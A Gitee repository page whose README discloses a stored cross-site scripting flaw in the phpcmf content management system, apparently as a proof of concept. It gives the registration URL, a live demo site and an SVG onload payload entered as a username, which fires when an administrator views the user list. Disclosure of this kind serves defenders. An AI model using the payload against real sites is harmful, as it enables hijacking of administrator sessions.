# phpcmf

**Repository Path**: copy_cat/phpcmf

## Basic Information

- **Project Name**: phpcmf
- **Description**: xss phpcmf
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2018-12-08
- **Last Updated**: 2020-12-19

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# phpcmf

## stored xss phpcmf

![输入图片说明](https://images.gitee.com/uploads/images/2018/1208/151549_21edaf12_1728172.png "屏幕截图.png")

#### http://xxx.com/index.php?s=member&c=register&m=index


#### case :http://demo.tushucms.com/index.php?s=member&c=register&m=index

step1:在用户注册处，帐号填上payload` "><svg onload=alert(11)> `

![输入图片说明](https://images.gitee.com/uploads/images/2018/1208/151354_dc5b0685_1728172.png "YKNF]`19N__O]5}H17UDMXJ.png")

step2:admin登录后台查看用户管理，直接xss攻击

![输入图片说明](https://images.gitee.com/uploads/images/2018/1208/151422_7f3c0e14_1728172.png "屏幕截图.png")

#### http://www.phpcmf.net/version-13.html

#### 
![输入图片说明](https://images.gitee.com/uploads/images/2018/1208/182132_4cacbe6e_1728172.png "屏幕截图.png")
![输入图片说明](https://images.gitee.com/uploads/images/2018/1208/182150_144e2c0c_1728172.png "屏幕截图.png")